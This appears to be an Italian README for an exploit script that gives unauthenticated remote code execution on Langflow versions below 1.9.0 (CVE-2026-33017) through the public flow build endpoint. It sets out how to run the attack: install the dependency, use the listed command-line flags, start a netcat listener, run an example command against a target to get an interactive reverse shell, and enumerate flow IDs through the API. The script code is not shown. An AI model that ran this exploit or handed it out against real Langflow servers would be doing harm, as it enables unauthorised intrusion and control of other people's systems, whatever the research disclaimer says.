
Exploit di RCE non autenticata in Langflow <1.9.0 (CVE-2026-33017)
Esecuzione di codice remoto per Langflow tramite l'endpoint build_public_tmp.
Exploit tramite l'endpoint Public Flow Build che esegue una reverse shell sul target.
httpxInstalla:
pip install httpx
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>
-u, --url : URL di base dell'istanza Langflow (es., https://flow.example.com/)-l, --lhost : Il tuo indirizzo IP per ricevere la reverse shell-p, --lport : Porta di ascolto per la reverse shell-f --flow-id : ID del flow target (obbligatorio – ottienilo da /api/v1/flows/ o dall'interfaccia utente)-c --client-id : Valore del cookie client_id per l'identificazione della sessioneAvvia un listener:
nc -nlvp 9001
Esegui l'exploit:
python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
Se ha successo, ottieni una shell bash interattiva.
flow-id valido. Elenca tutti i flow tramite GET /api/v1/flows o copia dall'URL del browser.MIT – per ricerca sulla sicurezza educativa ed etica.